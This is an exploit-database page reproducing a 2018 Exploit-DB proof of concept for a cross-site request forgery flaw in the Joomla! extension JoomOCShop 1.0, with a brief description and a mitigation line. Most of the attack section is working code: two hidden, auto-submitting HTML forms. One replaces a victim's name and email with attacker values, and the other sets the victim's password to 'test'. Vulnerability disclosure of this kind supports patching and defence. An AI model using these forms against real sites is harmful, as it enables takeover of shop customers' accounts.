header-logo
Suggest Exploit
vendor:
JoomOCShop
by:
L0RD
5.5
CVSS
MEDIUM
Cross site request forgery
Cross-Site Request Forgery (CSRF)
CWE
Product Name: JoomOCShop
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE:
CPE: a:joomlacommunity:joomocshop:1.0
Metasploit:
Other Scripts:
Platforms Tested: Kali Linux
2018

Joomla! extension JoomOCShop 1.0 – Cross site request forgery

This exploit allows an attacker to change user information and passwords in the Joomla! extension JoomOCShop 1.0. The attacker can modify the user's firstname, lastname, email, telephone, and fax. Another exploit allows the attacker to change the user's password.

Mitigation:

Apply the latest patch or update to the Joomla! extension JoomOCShop. Implement proper input validation and authentication mechanisms to prevent CSRF attacks.
Source

Exploit-DB raw data:

# Exploit Title: Joomla! extension JoomOCShop 1.0 - Cross site request forgery
# Date: 2018-05-28
# Exploit Author: L0RD or borna.nematzadeh123@gmail.com
# Software Link: https://extensions.joomla.org/extensions/extension/e-commerce/e-commerce-integrations/joomocshop/
# Vendor Homepage: https://www.joomlaextensions.co.in/
# Version: 1.0
# Tested on: Kali linux
===================================================

# POC :

# Change user information exploit :

<html>
  <body>
    <form action="http://site.com/joomoc2/?route=account/edit" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="firstname" value="decode" />
      <input type="hidden" name="lastname" value="revenge" />
      <input type="hidden" name="email" value="decod3&#46;n&#64;gmail&#46;com" />
      <input type="hidden" name="telephone" value="100000" />
      <input type="hidden" name="fax" value="&#13;" />
    </form>
    <script>
        document.forms[0].submit();
    </script>
  </body>
</html>


# Change password exploit :

<form action="http://site.com/jcart/account/password.html" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="password" value="test" />
      <input type="hidden" name="confirm" value="test" />
</form>
<script>
   document.forms[0].submit();
</script>

====================================================

Navigation

Suggest Exploit

Services By CQR